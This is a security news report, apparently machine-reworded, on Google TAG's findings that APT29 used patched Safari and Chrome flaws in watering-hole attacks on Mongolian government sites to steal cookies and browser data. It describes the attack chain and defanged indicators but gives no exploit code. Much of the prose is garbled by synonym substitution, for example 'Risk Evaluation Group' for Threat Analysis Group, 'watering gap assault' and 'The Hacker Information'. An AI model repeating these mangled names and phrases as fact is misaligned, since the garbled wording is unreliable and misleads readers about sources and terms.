Cybersecurity researchers have flagged a number of in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to contaminate cell customers with information-stealing malware.
“These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices,” Google Risk Evaluation Group (TAG) researcher Clement Lecigne stated in a report shared with The Hacker Information.
The exercise, noticed between November 2023 and July 2024, is notable for delivering the exploits by way of a watering gap assault on Mongolian authorities web sites, cupboard.gov[.]mn and mfa.gov[.]mn.
The intrusion set has been attributed with average confidence to a Russian state-backed risk actor codenamed APT29 (aka Midnight Blizzard), with parallels noticed between the exploits used within the campaigns and people beforehand linked to business surveillance distributors (CSVs) Intellexa and NSO Group, indicating exploit reuse.
The vulnerabilities on the heart of the campaigns are listed beneath –
- CVE-2023-41993 – A WebKit flaw that might lead to arbitrary code execution when processing specifically crafted internet content material (Fastened by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)
- CVE-2024-4671 – A use-after-free flaw in Chrome’s Visuals part that might lead to arbitrary code execution (Fastened by Google in Chrome model 124.0.6367.201/.202 for Home windows and macOS, and model 124.0.6367.201 for Linux in Might 2024)
- CVE-2024-5274 – A kind confusion flaw within the V8 JavaScript and WebAssembly engine that might lead to arbitrary code execution (Fastened by Google in Chrome model 125.0.6422.112/.113 for Home windows and macOS, and model 125.0.6422.112 for Linux in Might 2024)
The November 2023 and February 2024 campaigns are stated to have concerned the compromises of the 2 Mongolian authorities web sites – each within the first and solely mfa.gov[.]mn within the latter – to ship an exploit for CVE-2023-41993 by way of a malicious iframe part pointing to an actor-controlled area.
“When visited with an iPhone or iPad device, the watering hole sites used an iframe to serve a reconnaissance payload, which performed validation checks before ultimately downloading and deploying another payload with the WebKit exploit to exfiltrate browser cookies from the device,” Google stated.
The payload is a cookie stealer framework that Google TAG beforehand detailed in reference to the 2021 exploitation of an iOS zero-day (CVE-2021-1879) to reap authentication cookies from a number of well-liked web sites, together with Google, Microsoft, LinkedIn, Fb, Yahoo, GitHub, and Apple iCloud, and ship them through WebSocket to an attacker-controlled IP handle.
“The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated,” Google famous on the time, including “attackers used LinkedIn messaging to target government officials from western European countries by sending them malicious links.”
The truth that the cookie stealer module additionally singles out the web site “webmail.mfa.gov[.]mn” means that Mongolian authorities staff had been a probable goal of the iOS marketing campaign.
The mfa.gov[.]mn web site was contaminated a 3rd time in July 2024 to inject JavScript code that redirected Android customers utilizing Chrome to a malicious hyperlink that served an exploit chain combining the failings CVE-2024-5274 and CVE-2024-4671 to deploy a browser info stealing payload.
Specifically, the assault sequence makes use of CVE-2024-5274 to compromise the renderer and CVE-2024-4671 to attain a sandbox escape vulnerability, finally making it doable to interrupt out of Chrome web site isolation protections and ship a stealer malware.
“This campaign delivers a simple binary deleting all Chrome Crash reports and exfiltrating the following Chrome databases back to the track-adv[.]com server – similar to the basic final payload seen in the earlier iOS campaigns,” Google TAG famous.
The tech big additional stated the exploits used within the November 2023 watering gap assault and by Intellexa in September 2023 share the identical set off code, a sample additionally noticed within the triggers for CVE-2024-5274 used within the July 2024 watering gap assault and by NSO Group in Might 2024.
What’s extra, the exploit for CVE-2024-4671 is alleged to share similarities with a earlier Chrome sandbox escape that Intellexa was found as utilizing within the wild in reference to one other Chrome flaw CVE-2021-37973, which was addressed by Google in September 2021.
Whereas it is at present not clear how the attackers managed to accumulate the exploits for the three flaws, the findings make it amply clear that nation-state actors are utilizing n-day exploits that had been initially used as zero-days by CSVs.
It, nonetheless, raises the chance that the exploits might have been procured from a vulnerability dealer who beforehand offered them to the adware distributors as zero-days, a gentle provide of which retains the ball rolling as Apple and Google shore up defenses.
“Moreover, watering hole attacks remain a threat where sophisticated exploits can be utilized to target those that visit sites regularly, including on mobile devices,” the researchers stated. “Watering holes can still be an effective avenue for n-day exploits by mass targeting a population that might still run unpatched browsers.”
